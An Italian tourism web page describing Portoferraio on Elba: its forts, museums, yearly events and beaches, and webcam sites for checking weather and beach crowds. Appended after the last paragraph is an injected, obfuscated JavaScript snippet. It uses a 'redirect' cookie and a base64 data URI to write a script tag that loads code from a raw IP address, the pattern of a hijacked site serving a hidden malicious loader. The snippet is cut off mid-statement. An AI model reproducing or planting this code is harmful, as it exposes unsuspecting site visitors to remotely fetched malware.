Dalla struttura urbana romana alle ristrutturazioni napoleoniche, passando dai fasti tardo rinascimentali, i segni del tempo a Portoferraio sono un valore inestimabile che saprà aggiungere charme alla tua vacanza.
Cosa fare e vedere a Portoferraio all’Elba, meteo permettendo
Dominato dall’alto dal Forte Stella e dal Forte Falcone, Portoferraio, già conosciuto nelle narrazioni mitologiche col nome di Porto Argo e poi ribattezzato Fabricia dai Romani, oggi è capoluogo dell’isola e centro turistico di pregio, anche perché a Portoferraio il meteo è sempre clemente. Le mura cinquecentesche, la Torre del Martello, la Fortezza della Linguella, la Villa dei Mulini, San Martino, il Museo Demidoff, il Teatro dei Vigilanti, le strette stradine del centro storico, le piazzette panoramiche, i suggestivi scorci.
Tra gli eventi da non perdere: a Settembre il Festival Internazionale di Musica Classica e Jazz, ad Aprile la manifestazione culinaria sul polpo e la festa patronale di San Cristino; il Maggio Napoleonico e il Mercato artigianale e gastronomico, la festa di Ferragosto.
Ma questa zona offre anche alcune tra le più belle spiagge dell’isola e grazie a live webcam su Portoferraio sempre attive è possibile sapere in tempo reale le condizioni meteo di Portoferraio e l’Elba in generale. Organizzare una gita alla spiaggia delle Ghiaie, Biodola, Scaglieri, Schiopparello, Magazzini o Bagnaia sarà semplicissimo attraverso le web camera di Portoferraio, non solo per conoscere il meteo per Porto Ferraio, ma anche per vedere quanto è affollato l’arenile. Sì, perché le web cam su Portoferraio inquadrano proprio la spiaggia con gli ombrelloni, le sdraio e i pedalò.
In generale il meteo dell’Elba, a Portoferraio in particolare, è molto favorevole, ma la presenza a Portoferraio di web cam rappresenta una garanzia in più. Per accedere alle web cam dall’Elba di Portoferraio basta collegarsi a siti come www.skylinewebcams.com, www.elbalink.it, www.infoelba.it o www.elbaexplorer.com, dove è possibile connettersi ventiquattrore su ventiquattro da Portoferraio con webcam e vedere la situazione meteo su Portoferraio e dintorni.
Chissà cosa avrebbe detto Napoleone se all’epoca ci fossero state a Portoferraio web camera come oggi: amante della modernità e del progresso, probabilmente se ne sarebbe fatte installare molte di più per controllare tutta l’isola. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘